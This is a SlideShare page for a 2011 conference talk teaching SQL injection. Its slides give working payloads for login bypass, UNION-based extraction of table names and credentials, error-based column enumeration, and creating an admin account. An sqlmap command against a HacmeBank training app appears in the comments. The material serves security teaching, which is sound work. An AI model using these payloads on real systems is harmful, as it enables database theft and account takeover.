• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
How did i steal your database CSCamp2011
 

How did i steal your database CSCamp2011

on

  • 1,264 views

 

Statistics

Views

Total Views
1,264
Views on SlideShare
1,250
Embed Views
14

Actions

Likes
1
Downloads
40
Comments
0

3 Embeds 14

http://paper.li 8
http://a0.twimg.com 3
http://a0.twimg.com 3

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • -u "http://rajpc/HacmeBank_v2_Website/aspx/Main.aspx?function=TransactionDetails&account_no=5204320422040001" --cookie "ASP.NET_SessionId=fadqryjsmlb52y45hztq0pvc; CookieLoginAttempts=5; Admin=false" -p account_no

How did i steal your database CSCamp2011 How did i steal your database CSCamp2011 Presentation Transcript

  • How Did I Steal Your Database
    Mostafa Siraj
    Application Security Expert
  • DISCLAIMER
    Hacking websites is ILLEGAL
    This presentation is meant for educational purposes ONLY
    Only use this stuff on YOUR website and YOUR account
  • Nearly all applications rely on a Datastore
  • What is Database
    A Collection of Tables (Users, Orders, Countries,..etc)
    The tables are a collection of columns/rows
  • What is SQL
    A query language that allows interacting with the database
    SQL can
    Retrieve data from the database
    Insert new records in the database
    Delete records from the database
    Update records in the database
  • SQL Queries
    To get all data about Username elprince:
    SELECTUsername,Password, First_Name,Last_Name, Password
    FROM Users
    WHERE Username=‘elprince’
    Gives a result:
  • FACT
    Amongst Codd's rules for a Relational Database:
    Metadata must be stored in the database just as regular data is
  • SQL Injection
    is a technique where an attacker creates or alters existing SQL commands
    Expose hidden data (e.g. steal all the records from the tables)
    Override the data (e.g. Administrators password)
    Execute dangerous system level commands on the database host
  • SQL Injection Login Example
    SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’
    If the user entered Elprince, Elprince123the query will be
    SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
  • SQL Injection Ex Cont
    Suppose the User entered ‘ OR 1=1--, 123 the query will be
    SELECT * FROM Users WHERE
    Username=‘‘ OR 1=1--’ AND Password=‘123’
    -- comments everything afterwards, so the query will be
    SELECT * FROM Users WHERE
    Username=‘‘ OR 1=1--
  • This is not enough
    You can enhance the injection to login with the administrator account
    Enter ‘ or 1=1 ORDER BY 1--, abc the query will be
    SELECT * FROM Users WHERE
    Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
  • Finding SQL Injection Bugs
    Submit single quotation mark and observe the result
    Submit two single quotations and observe the result
  • Finding SQL Injection Bugs
    For multistate processes, complete all the states before observing the results
    For search fields try using the wildcard character %
  • Finding SQL Injection Bugs
    For numeric data, if the original value was 2 try submitting
    1+1 or 3-1
    If successful try using SQL-specific keywords, e.g.
    67-ASCII(‘A’)
    If single quotes are filtered try
    51-ASCII(1) [note ASCII(1)=49]
  • Identify the database engine
    The error messages will let us know the DB engine
    We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
  • Identify the database engine
    Use specific characters or commands:
    String concatenation in different DB engines
    : ‘||’FOO
    : ‘+’FOO
    : ‘‘FOO [note the space btw the 2 quotes]
  • Identify User privileges
    ‘ and 1 in (SELECTuser) --
    ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
  • Injection in Search Fields
    35
  • Entering Normal Input
  • Search Results
  • Trying Single Quote
  • I receive this error
    Error states that it’s
  • Suppose I still don’t know the DB engine, Is it
    Note: string concatenation in is +
  • I’m having an error, it’s not
  • Is it
    Note: string concatenation in Oracle is ||
  • Different error, still not
  • Is it
    Note: string concatenation in MySQL is blank space
  • It’s
  • The query in the backend is something like that
    SELECT …,…,…,…,…
    FROM ….
    WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….
    A possible location for my input
  • The Strategy
    Get number of items after the SELECT statement
    How many items are here
    SELECT …,…,…,…,…
    FROM ….
    WHERE ….=…. AND ….!=….. OR …..>……
  • The Strategy
    2. Identify the location of the STRINGS in the SELECT Statement
    Which of those are strings
    SELECT …,…,…,…,…
    FROM ….
    WHERE ….=…. AND ….!=….. OR …..>……
  • The Strategy
    3. Get the Structure of the database
    SELECT …,…,…,…,…
    FROM ….
    WHERE …. UNION
    SELECT ….,TableNames,….,….,…
    FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
  • The Strategy
    4. Get the data from the database
    SELECT …,…,…,…,…
    FROM ….
    WHERE …. UNION
    SELECT ….,Usernames,….,….,…
    FROM Users --=…. AND ….!=….. OR …..>……
  • The Strategy
    Get number of items after the SELECT statement
    Identify the location of the STRINGS in the SELECT Statement
    3. Get the Structure of the database
    4. Get the data from the database
  • 1. Get number of items after the SELECT statement
  • Error
  • Try another number
  • Result
    Why the results are less?
  • Try another number
  • Error, it’s not 8
  • Let’s try 7
  • Result
    How many columns do we have in the SELECT statement
  • The Strategy
    Get number of items after the SELECT statement
    Identify the location of the STRINGS in the SELECT Statement
    3. Get the Structure of the database
    4. Get the data from the database
  • 2. Identify the location of the STRINGS in the SELECT Statement
    1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  • Result
  • Get the Strings and the locations
    1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
  • Result
  • The Strategy
    Get number of items after the SELECT statement
    Identify the location of the STRINGS in the SELECT Statement
    3. Get the Structure of the database
    4. Get the data from the database
  • 3. Get the Structure of the database
    1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
  • Result
  • The Strategy
    Get number of items after the SELECT statement
    Identify the location of the STRINGS in the SELECT Statement
    3. Get the Structure of the database
    4. Get the data from the database
  • Next Queries
    1234')
    UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'#
    1234') UNION SELECT
    NULL,NULL,NULL,username,password,null,null
    FROM users
    WHERE id<100#
    …….
    Continue till you get all the tables
  • The Strategy
    Get number of items after the SELECT statement
    Identify the location of the STRINGS in the SELECT Statement
    3. Get the Structure of the database
    4. Get the data from the database
  • Injection with errors
  • Gives me an Error
  • Getting version
    ' and 1 in (SELECT @@version)--
  • Gives me this error
  • Getting Column names
  • I get this Error
  • Getting next column name
    ' group by login.firstname having 1=1--
  • I get this error
  • Again
    ' group by login.firstname, login.surname having 1=1--
  • Error reveals new column name
  • Again
    ' group by login.firstname, login.surname,login.username having 1=1--
  • New column name
  • Continue…
  • Continue…
  • Continue…
    After getting all of the columns I found a field called IsAdmin-that’s my goal -
    Putting the following query creates an admin account on the application
    ‘; INSERT INTO Login
    (username,pwd,IsAdmin,……)
    VALUES
    (‘Administrator’,’******’,TRUE,…..)
  • Not all Injections generate errors
  • DEMOSQLMap
  • You Were GREAT Audience
  • Thank You
    @mostafasiraj
    Mostafa Siraj